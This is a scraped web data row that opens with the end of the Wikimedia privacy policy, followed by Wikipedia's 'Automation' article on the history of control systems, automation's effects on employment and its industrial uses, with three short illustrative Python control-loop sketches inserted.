centers located in the U.S. If you decide to use Wikimedia Sites, whether from inside or outside of the U.S., you understand that your Personal Information will be collected, transferred, stored, processed, disclosed and otherwise used in the U.S. as described in this Privacy Policy. You also understand that your information may be transferred by us from the U.S. to other countries, which may have different or less stringent data protection laws than your country, in connection with providing services to you. We are strongly committed to protecting users' Personal Information. Under this Policy, we may share your information only under particular situations, which you can learn more about in the "When May We Share Your Information" section of this Privacy Policy. In particular, we do not share your Personal Information for marketing purposes. Because we protect all users in accordance with this Privacy Policy, we do not change our behavior in response to a web browser's "do not track" signal. For more information regarding Do Not Track signals and how we handle them, please visit our FAQ. Substantial changes to this Policy will not be made until after a public comment period of at least 30 days. 
Because things naturally change over time and we want to ensure our Privacy Policy accurately reflects our practices and the law, it may be necessary to modify this Privacy Policy from time to time. We reserve the right to do so in the following manner: We ask that you please review the most up-to-date version of our Privacy Policy. Your continued use of the Wikimedia Sites after any effective date of a subsequent version of this Privacy Policy constitutes acceptance of this Privacy Policy on your part. If you have questions or suggestions about this Privacy Policy, or the information collected under this Privacy Policy, please email us at privacy@wikimedia.org or contact us directly. If you are located in the European Economic Area and have questions about your personal data or would like to request to access, update, or delete it, you may contact our representative via email at EUrepresentative.Wikimedia@twobirds.com, or via mail at: If you are an individual located in the United Kingdom, and have questions about your personal data or would like to request to access, update, or delete it, you may contact our representative via email at UKrepresentative.Wikimedia@twobirds.com, or via mail at: Our European Economic Area and United Kingdom Representative can only be contacted for queries in relation to data protection. Depending on your jurisdiction, you also may have the right to lodge a complaint with a supervisory authority competent for your country or region. Thank you for reading our Privacy Policy. We hope you enjoy using the Wikimedia Sites and appreciate your participation in creating, maintaining, and constantly working to improve the largest repository of free knowledge in the world. Please note that in the event of any differences in meaning or interpretation between the original English version of this Privacy Policy and a translation, the original English version takes precedence. This version was approved by Amanda Keton on June 7, 2021, pursuant to the Delegation of policy-making authority by the Board, and went into effect on June 25, 2021. Previous versions can be found below: |
636 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Automation | Automation describes a wide range of technologies that reduce human intervention in processes, mainly by predetermining decision criteria, subprocess relationships, and related actions, as well as embodying those predeterminations in machines. 1 2 Automation has been achieved by various means including mechanical, hydraulic, pneumatic, electrical, electronic devices, and computers, usually in combination. Complicated systems, such as modern factories, airplanes, and ships typically use combinations of all of these techniques. The benefit of automation includes labor savings, reducing waste, savings in electricity costs, savings in material costs, and improvements to quality, accuracy, and precision. Automation includes the use of various equipment and control systems such as machinery, processes in factories, boilers, 3 and heat-treating ovens, switching on telephone networks, steering, stabilization of ships, aircraft and other applications and vehicles with reduced human intervention. 4 Examples range from a household thermostat controlling a boiler to a large industrial control system with tens of thousands of input measurements and output control signals. Automation has also found a home in the banking industry. It can range from simple on-off control to multi-variable high-level algorithms in terms of control complexity. In the simplest type of an automatic control loop, a controller compares a measured value of a process with a desired set value and processes the resulting error signal to change some input to the process, in such a way that the process stays at its set point despite disturbances. This closed-loop control is an application of negative feedback to a system. The mathematical basis of control theory was begun in the 18th century and advanced rapidly in the 20th. The term automation, inspired by the earlier word automatic (coming from automaton), was not widely used before 1947, when Ford established an automation department. 5 It was during this time that the industry was rapidly adopting feedback controllers, which were introduced in the 1930s. 6 The World Bank's World Development Report of 2019 shows evidence that the new industries and jobs in the technology sector outweigh the economic effects of workers being displaced by automation. 7 Job losses and downward mobility blamed on automation have been cited as one of many factors in the resurgence of nationalist, protectionist and populist politics in the US, UK and France, among other countries since the 2010s. 8 9 10 11 12 It was a preoccupation of the Greeks and Arabs (in the period between about 300 BC and about 1200 AD) to keep accurate track of time. In Ptolemaic Egypt, about 270 BC, Ctesibius described a float regulator for a water clock, a device not unlike the ball and cock in a modern flush toilet. This was the earliest feedback-controlled mechanism. 13 The appearance of the mechanical clock in the 14th century made the water clock and its feedback control system obsolete. The Persian Ban M s brothers, in their Book of Ingenious Devices (850 AD), described a number of automatic controls. 14 Two-step level controls for fluids, a form of discontinuous variable structure controls, were developed by the Banu Musa brothers. 15 They also described a feedback controller. 
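The closed-loop control described above (a controller compares a measured value with a desired set value and feeds the resulting error back into the process so it stays at its set point despite disturbances) can be made concrete with a short sketch. This example is not part of the scraped article: the proportional gain Kp, the set point, and the simple first-order process model are all assumed for illustration.
def simulate_proportional_control(setpoint=50.0, Kp=0.8, steps=100):
    measured = 20.0        # initial process value
    disturbance = -1.0     # constant load pulling the process away from the set point
    history = []
    for _ in range(steps):
        error = setpoint - measured       # compare measurement with the desired value
        control_input = Kp * error        # proportional corrective action (negative feedback)
        # toy first-order process: the value drifts toward the applied input
        measured += 0.1 * (control_input + disturbance)
        history.append(measured)
    return history

trace = simulate_proportional_control()
print(f"final value: {trace[-1]:.2f} (set point 50.0)")
The trace settles just below the set point; that small steady-state offset is the classic limitation of proportional-only control, and integral action was later added to controllers to remove it.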
16 17 The design of feedback control systems up through the Industrial Revolution was by trial-and-error, together with a great deal of engineering intuition. It was not until the mid 19th century that the stability of feedback control systems was analyzed using mathematics, the formal language of automatic control theory. citation needed The centrifugal governor was invented by Christiaan Huygens in the seventeenth century, and used to adjust the gap between millstones. 18 19 20 The introduction of prime movers, or self-driven machines advanced grain mills, furnaces, boilers, and the steam engine created a new requirement for automatic control systems including temperature regulators (invented in 1624; see Cornelius Drebbel), pressure regulators (1681), float regulators (1700) and speed control devices. Another control mechanism was used to tent the sails of windmills. It was patented by Edmund Lee in 1745. 21 Also in 1745, Jacques de Vaucanson invented the first automated loom. Around 1800, Joseph Marie Jacquard created a punch-card system to program looms. 22 In 1771 Richard Arkwright invented the first fully automated spinning mill driven by water power, known at the time as the water frame. 23 An automatic flour mill was developed by Oliver Evans in 1785, making it the first completely automated industrial process. 24 25 A centrifugal governor was used by Mr. Bunce of England in 1784 as part of a model steam crane. 26 27 The centrifugal governor was adopted by James Watt for use on a steam engine in 1788 after Watt's partner Boulton saw one at a flour mill Boulton Watt were building. 21 The governor could not actually hold a set speed; the engine would assume a new constant speed in response to load changes. The governor was able to handle smaller variations such as those caused by fluctuating heat load to the boiler. Also, there was a tendency for oscillation whenever there was a speed change. As a consequence, engines equipped with this governor were not suitable for operations requiring constant speed, such as cotton spinning. 21 Several improvements to the governor, plus improvements to valve cut-off timing on the steam engine, made the engine suitable for most industrial uses before the end of the 19th century. Advances in the steam engine stayed well ahead of science, both thermodynamics and control theory. 21 The governor received relatively little scientific attention until James Clerk Maxwell published a paper that established the beginning of a theoretical basis for understanding control theory. Relay logic was introduced with factory electrification, which underwent rapid adaption from 1900 through the 1920s. Central electric power stations were also undergoing rapid growth and the operation of new high-pressure boilers, steam turbines and electrical substations created a large demand for instruments and controls. Central control rooms became common in the 1920s, but as late as the early 1930s, most process controls were on-off. Operators typically monitored charts drawn by recorders that plotted data from instruments. To make corrections, operators manually opened or closed valves or turned switches on or off. Control rooms also used color-coded lights to send signals to workers in the plant to manually make certain changes. 28 The development of the electronic amplifier during the 1920s, which was important for long-distance telephony, required a higher signal-to-noise ratio, which was solved by negative feedback noise cancellation. 
This and other telephony applications contributed to control theory. In the 1940s and 1950s, German mathematician Irmgard Flügge-Lotz developed the theory of discontinuous automatic controls, which found military applications during the Second World War in fire control systems and aircraft navigation systems. 6 Controllers, which were able to make calculated changes in response to deviations from a set point rather than on-off control, began being introduced in the 1930s. Controllers allowed manufacturing to continue showing productivity gains to offset the declining influence of factory electrification. 29 Factory productivity was greatly increased by electrification in the 1920s. U.S. manufacturing productivity growth fell from 5.2% per year in 1919–29 to 2.76% per year in 1929–41. Alexander Field notes that spending on non-medical instruments increased significantly from 1929 to 1933 and remained strong thereafter. 29 The First and Second World Wars saw major advancements in the field of mass communication and signal processing. Other key advances in automatic controls include differential equations, stability theory and system theory (1938), frequency domain analysis (1940), ship control (1950), and stochastic analysis (1941). Starting in 1958, various systems based on solid-state 30 31 digital logic modules for hard-wired programmed logic controllers (the predecessors of programmable logic controllers, PLCs) emerged to replace electro-mechanical relay logic in industrial control systems for process control and automation, including early Telefunken/AEG Logistat, Siemens Simatic, Philips/Mullard/Valvo Norbit, BBC Sigmatronic, ACEC Logacec, Akkord Estacord, Krone Mibakron, Bistat, Datapac, Norlog, SSR, or Procontic systems. 30 32 33 34 35 36 In 1959 Texaco's Port Arthur Refinery became the first chemical plant to use digital control. 37 Conversion of factories to digital control began to spread rapidly in the 1970s as the price of computer hardware fell. The automatic telephone switchboard was introduced in 1892 along with dial telephones. By 1929, 31.9% of the Bell system was automatic. 38:158 Automatic telephone switching originally used vacuum tube amplifiers and electro-mechanical switches, which consumed a large amount of electricity. Call volume eventually grew so fast that it was feared the telephone system would consume all electricity production, prompting Bell Labs to begin research on the transistor. 39 The logic performed by telephone switching relays was the inspiration for the digital computer. The first commercially successful glass bottle-blowing machine was an automatic model introduced in 1905. 40 The machine, operated by a two-man crew working 12-hour shifts, could produce 17,280 bottles in 24 hours, compared to 2,880 bottles made by a crew of six men and boys working in a shop for a day. The cost of making bottles by machine was 10 to 12 cents per gross compared to $1.80 per gross by the manual glassblowers and helpers. Sectional electric drives were developed using control theory. Sectional electric drives are used on different sections of a machine where a precise differential must be maintained between the sections. In steel rolling, the metal elongates as it passes through pairs of rollers, which must run at successively faster speeds. In paper making, the paper sheet shrinks as it passes around steam-heated drying cylinders arranged in groups, which must run at successively slower speeds. The first application of a sectional electric drive was on a paper machine in 1919. 
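The passage above notes that, as late as the early 1930s, most process controls were on-off, the two-step control also mentioned earlier in connection with the Banu Musa brothers and the household thermostat. A minimal sketch of on-off control with a dead band (hysteresis), which keeps the output from chattering around the set point, might look like the following; the thermostat-style numbers are assumptions for illustration, not values from the article.
def on_off_controller(measured, heater_on, setpoint=60.0, deadband=2.0):
    """Return the new heater state for a two-step (on-off) controller with hysteresis."""
    if measured < setpoint - deadband:
        return True          # too cold: switch the heater on
    if measured > setpoint + deadband:
        return False         # too hot: switch the heater off
    return heater_on         # inside the dead band: keep the previous state

# toy simulation: temperature rises 1.5 units per step with the heater on, falls 1.0 with it off
temperature, heater = 50.0, False
for step in range(25):
    heater = on_off_controller(temperature, heater)
    temperature += 1.5 if heater else -1.0
    print(f"step {step:2d}  temperature {temperature:5.1f}  heater {'ON' if heater else 'off'}")
The output cycles within the dead band rather than holding the set point exactly, which is one reason on-off control gave way to the proportional controllers introduced in the 1930s.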
41 One of the most important developments in the steel industry during the 20th century was continuous wide strip rolling, developed by Armco in 1928. 42 Before automation, many chemicals were made in batches. In 1930, with the widespread use of instruments and the emerging use of controllers, the founder of Dow Chemical Co. was advocating continuous production. 43 Self-acting machine tools that displaced hand dexterity so they could be operated by boys and unskilled laborers were developed by James Nasmyth in the 1840s. 44 Machine tools were automated with Numerical control (NC) using punched paper tape in the 1950s. This soon evolved into computerized numerical control (CNC). Today extensive automation is practiced in practically every type of manufacturing and assembly process. Some of the larger processes include electrical power generation, oil refining, chemicals, steel mills, plastics, cement plants, fertilizer plants, pulp and paper mills, automobile and truck assembly, aircraft production, glass manufacturing, natural gas separation plants, food and beverage processing, canning and bottling and manufacture of various kinds of parts. Robots are especially useful in hazardous applications like automobile spray painting. Robots are also used to assemble electronic circuit boards. Automotive welding is done with robots and automatic welders are used in applications like pipelines. With the advent of the space age in 1957, controls design, particularly in the United States, turned away from the frequency-domain techniques of classical control theory and backed into the differential equation techniques of the late 19th century, which were couched in the time domain. During the 1940s and 1950s, German mathematician Irmgard Flugge-Lotz developed the theory of discontinuous automatic control, which became widely used in hysteresis control systems such as navigation systems, fire-control systems, and electronics. Through Flugge-Lotz and others, the modern era saw time-domain design for nonlinear systems (1961), navigation (1960), optimal control and estimation theory (1962), nonlinear control theory (1969), digital control and filtering theory (1974), and the personal computer (1983). Perhaps the most cited advantage of automation in industry is that it is associated with faster production and cheaper labor costs. Another benefit could be that it replaces hard, physical, or monotonous work. 45 Additionally, tasks that take place in hazardous environments or that are otherwise beyond human capabilities can be done by machines, as machines can operate even under extreme temperatures or in atmospheres that are radioactive or toxic. They can also be maintained with simple quality checks. However, at the time being, not all tasks can be automated, and some tasks are more expensive to automate than others. Initial costs of installing the machinery in factory settings are high, and failure to maintain a system could result in the loss of the product itself. Moreover, some studies seem to indicate that industrial automation could impose ill effects beyond operational concerns, including worker displacement due to systemic loss of employment and compounded environmental damage; however, these findings are both convoluted and controversial in nature, and could potentially be circumvented. 46 The main advantages of automation are: Automation primarily describes machines replacing human action, but it is also loosely associated with mechanization, machines replacing human labor. 
Coupled with mechanization, extending human capabilities in terms of size, strength, speed, endurance, visual range acuity, hearing frequency precision, electromagnetic sensing effecting, etc., advantages include: 48 The main disadvantages of automation are: The paradox of automation says that the more efficient the automated system, the more crucial the human contribution of the operators. Humans are less involved, but their involvement becomes more critical. Lisanne Bainbridge, a cognitive psychologist, identified these issues notably in her widely cited paper "Ironies of Automation. 49 If an automated system has an error, it will multiply that error until it is fixed or shut down. This is where human operators come in. 50 A fatal example of this was Air France Flight 447, where a failure of automation put the pilots into a manual situation they were not prepared for. 51 Many roles for humans in industrial processes presently lie beyond the scope of automation. Human-level pattern recognition, language comprehension, and language production ability are well beyond the capabilities of modern mechanical and computer systems (but see Watson computer). Tasks requiring subjective assessment or synthesis of complex sensory data, such as scents and sounds, as well as high-level tasks such as strategic planning, currently require human expertise. In many cases, the use of humans is more cost-effective than mechanical approaches even where the automation of industrial tasks is possible. Therefore, algorithmic management as the digital rationalization of human labor instead of its substitution has emerged as an alternative technological strategy. 53 Overcoming these obstacles is a theorized path to post-scarcity economics. 54 Increased automation often causes workers to feel anxious about losing their jobs as technology renders their skills or experience unnecessary. Early in the Industrial Revolution, when inventions like the steam engine were making some job categories expendable, workers forcefully resisted these changes. Luddites, for instance, were English textile workers who protested the introduction of weaving machines by destroying them. 55 More recently, some residents of Chandler, Arizona, have slashed tires and pelted rocks at self-driving car, in protest over the cars' perceived threat to human safety and job prospects. 56 The relative anxiety about automation reflected in opinion polls seems to correlate closely with the strength of organized labor in that region or nation. For example, while a study by the Pew Research Center indicated that 72% of Americans are worried about increasing automation in the workplace, 80% of Swedes see automation and artificial intelligence (AI) as a good thing, due to the country's still-powerful unions and a more robust national safety net. 57 In the U.S., 47% of all current jobs have the potential to be fully automated by 2033, according to the research of experts Carl Benedikt Frey and Michael Osborne. Furthermore, wages and educational attainment appear to be strongly negatively correlated with an occupation's risk of being automated. 58 Even highly skilled professional jobs like a lawyer, doctor, engineer, journalist are at risk of automation. 59 Prospects are particularly bleak for occupations that do not presently require a university degree, such as truck driving. 60 Even in high-tech corridors like Silicon Valley, concern is spreading about a future in which a sizable percentage of adults have little chance of sustaining gainful employment. 
61 "In The Second Machine Age, Erik Brynjolfsson and Andrew McAfee argue that ...there's never been a better time to be a worker with special skills or the right education, because these people can use technology to create and capture value. However, there's never been a worse time to be a worker with only 'ordinary' skills and abilities to offer, because computers, robots, and other digital technologies are acquiring these skills and abilities at an extraordinary rate. 62 As the example of Sweden suggests, however, the transition to a more automated future need not inspire panic, if there is sufficient political will to promote the retraining of workers whose positions are being rendered obsolete. According to a 2020 study in the Journal of Political Economy, automation has robust negative effects on employment and wages: "One more robot per thousand workers reduces the employment-to-population ratio by 0.2 percentage points and wages by 0.42%. 63 Research by Carl Benedikt Frey and Michael Osborne of the Oxford Martin School argued that employees engaged in "tasks following well-defined procedures that can easily be performed by sophisticated algorithms" are at risk of displacement, and 47% of jobs in the US were at risk. The study, released as a working paper in 2013 and published in 2017, predicted that automation would put low-paid physical occupations most at risk, by surveying a group of colleagues on their opinions. 64 However, according to a study published in McKinsey Quarterly 65 in 2015 the impact of computerization in most cases is not the replacement of employees but the automation of portions of the tasks they perform. 66 The methodology of the McKinsey study has been heavily criticized for being intransparent and relying on subjective assessments. 67 The methodology of Frey and Osborne has been subjected to criticism, as lacking evidence, historical awareness, or credible methodology. 68 69 Additionally, the Organisation for Economic Co-operation and Development (OECD) found that across the 21 OECD countries, 9% of jobs are automatable. 70 The Obama administration pointed out that every 3 months "about 6 percent of jobs in the economy are destroyed by shrinking or closing businesses, while a slightly larger percentage of jobs are added. 71 A recent MIT economics study of automation in the U.S. from 1990 to 2007 found that there may be a negative impact on employment and wages when robots are introduced to an industry. When one robot is added per one thousand workers, the employment to population ratio decreases between 0.18 and 0.34 percentages and wages are reduced by 0.25 0.5 percentage points. During the time period studied, the US did not have many robots in the economy which restricts the impact of automation. However, automation is expected to triple (conservative estimate) or quadruple (a generous estimate) leading these numbers to become substantially higher. 72 Based on a formula by Gilles Saint-Paul, an economist at Toulouse 1 University, the demand for unskilled human capital declines at a slower rate than the demand for skilled human capital increases. 73 In the long run and for society as a whole it has led to cheaper products, lower average work hours, and new industries forming (i.e., robotics industries, computer industries, design industries). These new industries provide many high salary skill-based jobs to the economy. 
By 2030, between 3 and 14 percent of the global workforce will be forced to switch job categories due to automation eliminating jobs in an entire sector. While the number of jobs lost to automation is often offset by jobs gained from technological advances, the jobs lost are not the same as the jobs created, leading to increasing unemployment in the lower-middle class. This occurs largely in the US and developed countries where technological advances contribute to higher demand for highly skilled labor but demand for middle-wage labor continues to fall. Economists call this trend "income polarization", where wages for unskilled labor are driven down while wages for skilled labor are driven up, and it is predicted to continue in developed economies. 74 Unemployment is becoming a problem in the U.S. due to the exponential growth rate of automation and technology. According to Kim, Kim, and Lee (2017:1), a seminal study by Frey and Osborne in 2013 predicted that 47% of the 702 examined occupations in the U.S. faced a high risk of decreased employment rate within the next 10 to 25 years as a result of computerization. As many jobs are becoming obsolete, which is causing job displacement, one possible solution would be for the government to assist with a universal basic income (UBI) program. UBI would be a guaranteed, non-taxed income of around 1,000 dollars per month, paid to all U.S. citizens over the age of 21. UBI would help those who are displaced take on jobs that pay less money and still afford to get by. It would also give those employed in jobs that are likely to be replaced by automation and technology extra money to spend on education and training in newly in-demand skills. UBI, however, should be seen as a short-term solution, as it does not fully address the issue of income inequality, which will be exacerbated by job displacement. Lights-out manufacturing is a production system with no human workers, intended to eliminate labor costs. Lights-out manufacturing grew in popularity in the U.S. when General Motors in 1982 implemented a "hands-off" manufacturing process intended to "replace risk-averse bureaucracy with automation and robots". However, the factory never reached full "lights-out" status. 75 The expansion of lights-out manufacturing requires: 76 The costs of automation to the environment are different depending on the technology, product or engine automated. There are automated engines that consume more energy resources from the Earth in comparison with previous engines and vice versa. Hazardous operations, such as oil refining, the manufacturing of industrial chemicals, and all forms of metal working, were always early contenders for automation. The automation of vehicles could prove to have a substantial impact on the environment, although the nature of this impact could be beneficial or harmful depending on several factors. Because automated vehicles are much less likely to get into accidents compared to human-driven vehicles, some precautions built into current models (such as anti-lock brakes or laminated glass) would not be required for self-driving versions. Removal of these safety features reduces the weight of the vehicle, and coupled with more precise acceleration and braking, as well as fuel-efficient route mapping, can increase fuel economy and reduce emissions. 
Despite this, some researchers theorize that an increase in the production of self-driving cars could lead to a boom in vehicle ownership and usage, which could potentially negate any environmental benefits of self-driving cars if they are used more frequently. 77 Automation of homes and home appliances is also thought to impact the environment. A study of energy consumption of automated homes in Finland showed that smart homes could reduce energy consumption by monitoring levels of consumption in different areas of the home and adjusting consumption to reduce energy leaks (e.g. automatically reducing consumption during the nighttime when activity is low). This study, along with others, indicated that the smart home's ability to monitor and adjust consumption levels would reduce unnecessary energy usage. However, some research suggests that smart homes might not be as efficient as non-automated homes. A more recent study has indicated that, while monitoring and adjusting consumption levels do decrease unnecessary energy use, this process requires monitoring systems that also consume an amount of energy. The energy required to run these systems sometimes negates their benefits, resulting in little to no ecological benefit. 78 Another major shift in automation is the increased demand for flexibility and convertibility in manufacturing processes. Manufacturers are increasingly demanding the ability to easily switch from manufacturing Product A to manufacturing Product B without having to completely rebuild the production lines. Flexibility and distributed processes have led to the introduction of Automated Guided Vehicles with Natural Features Navigation. Digital electronics helped too. Former analog-based instrumentation was replaced by digital equivalents which can be more accurate and flexible, and offer greater scope for more sophisticated configuration, parametrization, and operation. This was accompanied by the fieldbus revolution which provided a networked (i.e. a single cable) means of communicating between control systems and field-level instrumentation, eliminating hard-wiring. Discrete manufacturing plants adopted these technologies fast. The more conservative process industries with their longer plant life cycles have been slower to adopt and analog-based measurement and control still dominate. The growing use of Industrial Ethernet on the factory floor is pushing these trends still further, enabling manufacturing plants to be integrated more tightly within the enterprise, via the internet if necessary. Global competition has also increased demand for Reconfigurable Manufacturing Systems. 79 Engineers can now have numerical control over automated devices. The result has been a rapidly expanding range of applications and human activities. Computer-aided technologies (or CAx) now serve as the basis for mathematical and organizational tools used to create complex systems. Notable examples of CAx include computer-aided design (CAD software) and computer-aided manufacturing (CAM software). The improved design, analysis, and manufacture of products enabled by CAx has been beneficial for industry. 80 Information technology, together with industrial machinery and processes, can assist in the design, implementation, and monitoring of control systems. One example of an industrial control system is a programmable logic controller (PLC). 
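Before the fuller description of programmable logic controllers in the passage below, here is a minimal sketch of the scan cycle such a controller typically runs: read all inputs, evaluate the control logic, then write all outputs, repeating continuously. The sensor names and the interlock logic are invented for illustration, and no real PLC library is used.
def read_inputs():
    # in a real PLC these values would come from field sensors; here they are stubbed
    return {"start_button": True, "level_sensor_high": False}

def evaluate_logic(inputs, state):
    # simple interlock: run the pump while the start button is pressed
    # and the high-level sensor has not tripped
    state["pump_run"] = inputs["start_button"] and not inputs["level_sensor_high"]
    return {"pump_contactor": state["pump_run"]}

def write_outputs(outputs):
    # in a real PLC these values would drive actuators; here we just print them
    print("outputs:", outputs)

state = {"pump_run": False}
for _ in range(3):    # a real controller repeats this scan indefinitely, many times per second
    write_outputs(evaluate_logic(read_inputs(), state))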
PLCs are specialized hardened computers which are frequently used to synchronize the flow of inputs from (physical) sensors and events with the flow of outputs to actuators and events. 81 Human-machine interfaces (HMI) or computer human interfaces (CHI), formerly known as man-machine interfaces, are usually employed to communicate with PLCs and other computers. Service personnel who monitor and control through HMIs can be called by different names. In the industrial process and manufacturing environments, they are called operators or something similar. In boiler houses and central utility departments, they are called stationary engineers. 82 Different types of automation tools exist: Host simulation software (HSS) is a commonly used testing tool that is used to test the equipment software. HSS is used to test equipment performance concerning factory automation standards (timeouts, response time, processing time). 83 Cognitive automation, as a subset of AI, is an emerging genus of automation enabled by cognitive computing. Its primary concern is the automation of clerical tasks and workflows that consist of structuring unstructured data. citation needed Cognitive automation relies on multiple disciplines: natural language processing, real-time computing, machine learning algorithms, big data analytics, and evidence-based learning. 84 According to Deloitte, cognitive automation enables the replication of human tasks and judgment "at rapid speeds and considerable scale. 85 Such tasks include: Artificially intelligent computer-aided design (CAD) can use text-to 3D, image-to 3D, and video-to 3D to automate in 3D modeling. 86 Ai CAD libraries could also be developed using linked open data of schematics and diagrams. 87 Ai CAD assistants are used as tools to help streamline workflow. 88 Technologies like solar panels, wind turbines, and other renewable energy sources—together with smart grids, micro-grids, battery storage—can automate power production. Many agricultural operations are automated with machinery and equipment to improve their diagnosis, decision-making and or performing. Agricultural automation can relieve the drudgery of agricultural work, improve the timeliness and precision of agricultural operations, raise productivity and resource-use efficiency, build resilience, and improve food quality and safety. 89 Increased productivity can free up labour, allowing agricultural households to spend more time elsewhere. 90 The technological evolution in agriculture has resulted in progressive shifts to digital equipment and robotics. 89 Motorized mechanization using engine power automates the performance of agricultural operations such as ploughing and milking. 91 With digital automation technologies, it also becomes possible to automate diagnosis and decision-making of agricultural operations. 89 For example, autonomous crop robots can harvest and seed crops, while drones can gather information to help automate input application. 90 Precision agriculture often employs such automation technologies 90 Motorized mechanization has generally increased in recent years. 92 Sub-Saharan Africa is the only region where the adoption of motorized mechanization has stalled over the past decades. 93 90 Automation technologies are increasingly used for managing livestock, though evidence on adoption is lacking. Global automatic milking system sales have increased over recent years, 94 but adoption is likely mostly in Northern Europe, 95 and likely almost absent in low- and middle-income countries. 
96 90 Automated feeding machines for both cows and poultry also exist, but data and evidence regarding their adoption trends and drivers is likewise scarce. 90 92 Many supermarkets and even smaller stores are rapidly introducing self-checkout systems reducing the need for employing checkout workers. In the U.S., the retail industry employs 15.9 million people as of 2017 (around 1 in 9 Americans in the workforce). Globally, an estimated 192 million workers could be affected by automation according to research by Eurasia Group. 97 Online shopping could be considered a form of automated retail as the payment and checkout are through an automated online transaction processing system, with the share of online retail accounting jumping from 5.1% in 2011 to 8.3% in 2016. citation needed However, two-thirds of books, music, and films are now purchased online. In addition, automation and online shopping could reduce demands for shopping malls, and retail property, which in the United States is currently estimated to account for 31% of all commercial property or around 7 billion square feet (650 million square metres). Amazon has gained much of the growth in recent years for online shopping, accounting for half of the growth in online retail in 2016. 97 Other forms of automation can also be an integral part of online shopping, for example, the deployment of automated warehouse robotics such as that applied by Amazon using Kiva Systems. The food retail industry has started to apply automation to the ordering process; McDonald's has introduced touch screen ordering and payment systems in many of its restaurants, reducing the need for as many cashier employees. 98 The University of Texas at Austin has introduced fully automated cafe retail locations. 99 Some Cafes and restaurants have utilized mobile and tablet "apps" to make the ordering process more efficient by customers ordering and paying on their device. 100 Some restaurants have automated food delivery to tables of customers using a Conveyor belt system. The use of robots is sometimes employed to replace waiting staff. 101 Automation in construction is the combination of methods, processes, and systems that allow for greater machine autonomy in construction activities. Construction automation may have multiple goals, including but not limited to, reducing jobsite injuries, decreasing activity completion times, and assisting with quality control and quality assurance. 102 Automated mining involves the removal of human labor from the mining process. 103 The mining industry is currently in the transition towards automation. Currently, it can still require a large amount of human capital, particularly in the third world where labor costs are low so there is less incentive for increasing efficiency through automation. The Defense Advanced Research Projects Agency (DARPA) started the research and development of automated visual surveillance and monitoring (VSAM) program, between 1997 and 1999, and airborne video surveillance (AVS) programs, from 1998 to 2002. Currently, there is a major effort underway in the vision community to develop a fully-automated tracking surveillance system. Automated video surveillance monitors people and vehicles in real-time within a busy environment. Existing automated surveillance systems are based on the environment they are primarily designed to observe, i.e., indoor, outdoor or airborne, the number of sensors that the automated system can handle and the mobility of sensors, i.e., stationary camera vs. mobile camera. 
The purpose of a surveillance system is to record properties and trajectories of objects in a given area, generate warnings or notify the designated authorities in case of occurrence of particular events. 104 As demands for safety and mobility have grown and technological possibilities have multiplied, interest in automation has grown. Seeking to accelerate the development and introduction of fully automated vehicles and highways, the U.S. Congress authorized more than $650 million over six years for intelligent transport systems (ITS) and demonstration projects in the 1991 Intermodal Surface Transportation Efficiency Act (ISTEA). Congress legislated in ISTEA that: 105 The Secretary of Transportation shall develop an automated highway and vehicle prototype from which future fully automated intelligent vehicle-highway systems can be developed. Such development shall include research in human factors to ensure the success of the man-machine relationship. The goal of this program is to have the first fully automated highway roadway or an automated test track in operation by 1997. This system shall accommodate the installation of equipment in new and existing motor vehicles. Full automation is commonly defined as requiring no control or very limited control by the driver; such automation would be accomplished through a combination of sensor, computer, and communications systems in vehicles and along the roadway. Fully automated driving would, in theory, allow closer vehicle spacing and higher speeds, which could enhance traffic capacity in places where additional road building is physically impossible, politically unacceptable, or prohibitively expensive. Automated controls also might enhance road safety by reducing the opportunity for driver error, which causes a large share of motor vehicle crashes. Other potential benefits include improved air quality (as a result of more-efficient traffic flows), increased fuel economy, and spin-off technologies generated during research and development related to automated highway systems. 106 Automated waste collection trucks reduce the need for as many workers and ease the level of labor required to provide the service. 107 Business process automation (BPA) is the technology-enabled automation of complex business processes. 108 It can help to streamline a business for simplicity, achieve digital transformation, increase service quality, improve service delivery or contain costs. BPA consists of integrating applications, restructuring labor resources and using software applications throughout the organization. Robotic process automation (RPA; or RPAAI for self-guided RPA 2.0) is an emerging field within BPA and uses AI. BPAs can be implemented in a number of business areas including marketing, sales and workflow. Home automation (also called domotics) designates an emerging practice of increased automation of household appliances and features in residential dwellings, particularly through electronic means that allow for things impracticable, overly expensive or simply not possible in recent past decades. The rise in the usage of home automation solutions reflects people's increasing dependency on such solutions, and the added comfort they provide is considerable. 109 Automation is essential for many scientific and clinical applications. 110 Therefore, automation has been extensively employed in laboratories. 
From as early as 1980 fully automated laboratories have already been working. 111 However, automation has not become widespread in laboratories due to its high cost. This may change with the ability of integrating low-cost devices with standard laboratory equipment. 112 113 Autosamplers are common devices used in laboratory automation. Logistics automation is the application of computer software or automated machinery to improve the efficiency of logistics operations. Typically this refers to operations within a warehouse or distribution center, with broader tasks undertaken by supply chain engineering systems and enterprise resource planning systems. Industrial automation deals primarily with the automation of manufacturing, quality control, and material handling processes. General-purpose controllers for industrial processes include programmable logic controllers, stand-alone I O modules, and computers. Industrial automation is to replace the human action and manual command-response activities with the use of mechanized equipment and logical programming commands. One trend is increased use of machine vision 114 to provide automatic inspection and robot guidance functions, another is a continuing increase in the use of robots. Industrial automation is simply required in industries. The rise of industrial automation is directly tied to the "Fourth Industrial Revolution", which is better known now as Industry 4.0. Originating from Germany, Industry 4.0 encompasses numerous devices, concepts, and machines, 115 as well as the advancement of the industrial internet of things (IIoT). An "Internet of Things is a seamless integration of diverse physical objects in the Internet through a virtual representation. 116 These new revolutionary advancements have drawn attention to the world of automation in an entirely new light and shown ways for it to grow to increase productivity and efficiency in machinery and manufacturing facilities. Industry 4.0 works with the IIoT and software hardware to connect in a way that (through communication technologies) add enhancements and improve manufacturing processes. Being able to create smarter, safer, and more advanced manufacturing is now possible with these new technologies. It opens up a manufacturing platform that is more reliable, consistent, and efficient than before. Implementation of systems such as SCADA is an example of software that takes place in Industrial Automation today. SCADA is a supervisory data collection software, just one of the many used in Industrial Automation. 117 Industry 4.0 vastly covers many areas in manufacturing and will continue to do so as time goes on. 115 Industrial robotics is a sub-branch in industrial automation that aids in various manufacturing processes. Such manufacturing processes include machining, welding, painting, assembling and material handling to name a few. 118 Industrial robots use various mechanical, electrical as well as software systems to allow for high precision, accuracy and speed that far exceed any human performance. The birth of industrial robots came shortly after World War II as the U.S. saw the need for a quicker way to produce industrial and consumer goods. 119 Servos, digital logic and solid-state electronics allowed engineers to build better and faster systems and over time these systems were improved and revised to the point where a single robot is capable of running 24 hours a day with little or no maintenance. 
